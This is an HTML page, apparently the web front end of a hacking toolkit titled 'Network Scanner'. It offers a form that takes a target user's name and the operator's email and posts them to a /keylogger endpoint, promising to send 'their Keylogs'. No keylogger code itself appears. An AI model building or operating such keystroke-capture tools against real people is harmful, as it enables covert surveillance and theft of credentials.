<html>
    <head>
        <title> Network Scanner </title>
        <style>
       *{
        padding: 0;
        margin: 0;
        font-family: Arial, Helvetica, sans-serif;
       }    
      body {
			display: flex;
			justify-content: center;
			align-items: center;
			background-color: black;
		}
    .login-box{
      height: 500px;
      width: 500px;
      position: relative;
      margin: 30px 10px;
			padding: 20px 15px;
			background: #3500D3;
      box-shadow: 0 5px 202px #240090;
    }
    .heading{
      text-align: center;
      font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
      color:white;
      margin-bottom: 60px;
    }
    .box{
      width: 100px;
      height: 50px;
      margin-bottom: 10px;
    }
    .urlinput{
      width: 350px;
      border-radius: 5px;
      color:black;
      font-weight: bold;
    }
   .urlinput:focus{
    outline:none;
    border-color: aqua;
    box-shadow: 0 5px 202px aqua;
   }
   .xpaths{
      width: 150px;
      border-radius: 5px;
      color:black;
      font-weight: bold;
   }
   .xpaths:focus{
    outline:none;
    border-color: aqua;
    box-shadow: 0 5px 202px aqua;
   }
  .title-string-input{
      width: 250px;
      border-radius: 5px;
      color:black;
      font-weight: bold;
  }
  .title-string-input:focus{
    outline:none;
    border-color: aqua;
    box-shadow: 0 5px 202px aqua;
  }
  .btnval{
            background-color: green;
            color:white;
            font-weight: bold;
            border-radius: 12px;
            height: 30px;
            width: 60px;
        }
</style>
</head>
<body>
<div class="login-box">
  <div class="heading">
    <h4>Enter The name of User and your email id, where we will send you their Keylogs</h4>
  </div>
  <form action="/keylogger" method="post">
    <div class="box">
    <label class="heading">User Name: </label>
    <input name="username" class="urlinput" type="text">
    </div>
    <div class="box">
        <label class="heading">Your email id: </label>
        <input name="emailid" class="email" type="text">
        </div>
    <div class="box">
      <button type="submit" class="btnval">Submit</button>
    </div>
  </form>
  <form action="/index" method="post">
    <div class="box">
      <button class="btnval" type="submit">Back</button>
    </div>
  </form>
</div>
</body>
</html>